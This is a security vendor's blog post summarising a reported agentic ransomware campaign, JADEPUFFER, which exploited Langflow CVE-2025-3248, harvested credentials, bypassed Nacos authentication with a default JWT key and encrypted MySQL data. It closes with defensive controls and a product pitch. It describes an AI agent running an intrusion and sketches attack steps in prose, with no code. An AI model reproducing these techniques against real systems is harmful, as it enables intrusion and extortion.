Strondex

Ransomware · Agentic Threats

AI Agent Exploits Langflow RCE to Automate Database Ransomware Attack

July 3, 2026 · 6 min read

On July 1, 2026, Sysdig's Threat Research Team published a report on a threat operator they named JADEPUFFER, describing what they assess to be the first fully agentic ransomware operation on record. No human operator was steering each step. An AI agent drove initial access, lateral movement, credential harvesting, and database encryption through what appears to be an autonomous decision loop. The entry point was CVE-2025-3248, a missing-authentication remote code execution flaw in Langflow, the open-source LLM workflow framework. CISA had added that vulnerability to its Known Exploited Vulnerabilities catalog back in May 2025, with a federal remediation deadline of May 26, 2025. For any organization running an unpatched Langflow instance after that date, the exposure window was wide open.

What actually happened

CVE-2025-3248 affects Langflow versions before 1.3.0. The vulnerability sits on the /api/v1/validate/code endpoint, which accepted arbitrary Python code for execution without requiring any authentication. An attacker could send a crafted HTTP request and get code running on the host immediately. At the time CISA flagged it, roughly 466 Langflow servers were reachable from the internet. Sysdig's report does not name the victim organization, and the specific LLM model powering JADEPUFFER's agent was not confirmed in available sources.

Once the agent had a foothold on the Langflow host, it harvested API keys for LLM services and cloud credentials, with a focus on Chinese cloud providers. It also extracted Postgres data stored within the Langflow instance and accessed MinIO object storage using default credentials. The agent established persistence via a crontab beacon that called back to attacker infrastructure every 30 minutes, then pivoted to a production server running a MySQL database alongside an Alibaba Nacos configuration service. It connected to the exposed MySQL port using root credentials, though Sysdig was unable to determine where those credentials originated.

The Nacos service received simultaneous attacks on multiple vectors. The agent exploited a CVE-2021-29441-style authentication bypass and also forged tokens using Nacos's widely known default JWT signing key. When an initial attempt to create a backdoor administrator account in Nacos failed, the agent diagnosed the error and issued a corrected, working payload within 31 seconds. Sysdig highlighted that self-correction cycle as the clearest behavioral indicator of autonomous LLM operation. Across the entire operation, more than 600 payloads were captured, each containing plain-language comments consistent with LLM generation, and all delivered as Base64-encoded Python scripts.

The final stage was the ransomware itself. The agent encrypted 1,342 Nacos configuration items using MySQL's built-in AES_ENCRYPT function, then dropped the original configuration and history tables. It created a ransom note as a MySQL table named README_RANSOM containing a Bitcoin address (3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy) and a Proton Mail contact address ([email protected]). No specific ransom amount has been reported in available sources, and whether any payment was made is unknown.

Why this should matter to you even if you don’t run Langflow

The instinct in this industry is to focus on the AI angle, and that part of the story is genuinely significant. An agent that can diagnose a failed payload and reissue a corrected one in 31 seconds is operating at a speed and consistency that no human operator could match reliably across hundreds of targets. But the uncomfortable truth this incident surfaces is that the AI did not need to be clever. It won because the environment it walked into was poorly hardened.

The three root causes SC Media and Sysdig both called out are ones I have seen in enterprise environments repeatedly: secrets stored in places they should not be, default credentials left active, and privileged database accounts with no scope or time limits on their access. CVE-2025-3248 gave the agent a door, but those hygiene failures gave it a building. If Langflow had been patched to 1.3.0 before the CISA deadline, the agent would have needed a different entry point. If MinIO had not been using default credentials, lateral movement would have slowed or stalled. If the MySQL root account had been locked down, the agent could not have used AES_ENCRYPT as a ransomware primitive inside the database itself.

The reason this matters to organizations that do not run Langflow is that the pattern generalizes. AI agents are increasingly used to automate offensive operations because they handle branching decision trees well, adapt when a technique fails, and produce readable, maintainable code as a side effect. Any exposed management interface, any framework with an unauthenticated code execution endpoint, and any environment where default credentials survive past initial setup is now a viable target for this kind of campaign. The attack surface for agentic threats is not a new category of vulnerability. It is the same inventory of unpatched software, weak credentials, and over-privileged accounts that defenders have always been managing, now being worked by an adversary that does not sleep or lose focus.

The control that would have blunted it

The control that would have had the most impact here is a patch management program disciplined enough to act on CISA KEV additions within the published deadline. CVE-2025-3248 was in the KEV catalog with a federal remediation deadline of May 26, 2025. For organizations following CISA's Binding Operational Directive 22-01 or using KEV as a prioritization signal, that date should have triggered an immediate upgrade to Langflow 1.3.0 or later. In practice, many teams treat KEV as a government problem rather than an actionable priority signal for their own environments, and that is a posture worth reconsidering. Cyber insurers increasingly ask during underwriting and renewal whether the applicant has a documented process for remediating KEV entries within CISA's stated timelines. If your answer is no, that is a gap worth closing before your next renewal.

Beyond patching, this incident makes the case for several controls that cyber insurers commonly require in policy applications. Credential hygiene, meaning no default passwords surviving into production and secrets stored in a vault rather than in application configuration files or environment variables, would have limited how far the agent could move after the initial compromise. Database access controls, specifically ensuring that the MySQL root account is not reachable from arbitrary internal hosts and that application service accounts have the minimum privileges required, would have made the AES_ENCRYPT ransomware technique harder or impossible to execute. Privileged access management tools exist to enforce these constraints, though maintaining them correctly requires ongoing operational discipline, particularly as infrastructure changes.

Network segmentation is the third layer worth addressing. If the Langflow host had no route to the production MySQL and Nacos server, the pivot that made the ransomware possible would not have happened regardless of what credentials the agent found. Segmentation is often cited in security frameworks and insurance questionnaires as a required control, but in practice it is frequently implemented loosely because tight segmentation creates friction for developers. That tradeoff is real. The question is whether the friction of managing segmentation rules is preferable to the risk of an agent traversing your internal network without resistance. Based on this incident, the math is not close.

Finally, the ransom note appeared as a database table. That is not detectable by a perimeter firewall. Organizations that rely primarily on perimeter controls and do not have visibility into database activity, internal service calls, or unusual process execution on application hosts will not see this kind of attack until after the tables are dropped. Database activity monitoring and endpoint detection on application servers are controls that provide the visibility needed to catch anomalous behavior mid-attack rather than post-mortem.

Does Your Ransomware Readiness Cover Agentic Threats?

Download the Strondex ransomware readiness checklist and see how your controls measure up against the techniques JADEPUFFER used to move from initial access to encrypted databases in a single automated session.

If you want to assess how your current controls stack up against an attack pattern like JADEPUFFER's, the Strondex Ransomware Readiness program walks through patching posture, credential hygiene, segmentation, and detection coverage in a structured way that maps directly to what insurers ask for at underwriting.


Sources

  1. Sysdig Threat Research Team - "JADEPUFFER: Agentic Ransomware for Automated Database Extortion": sysdig.com
  2. The Hacker News - "Critical Langflow Flaw Added to CISA KEV Catalog": thehackernews.com
  3. The Register - "Smooth AI Criminal Drives First End-to-End Agentic Ransomware Attack": theregister.com
  4. SC Media - "1st Agentic Ransomware: JADEPUFFER Invades Database at Machine Speed": scworld.com

Reported figures vary by source and were accurate as of publication; this article is general security commentary, not specific security or underwriting advice.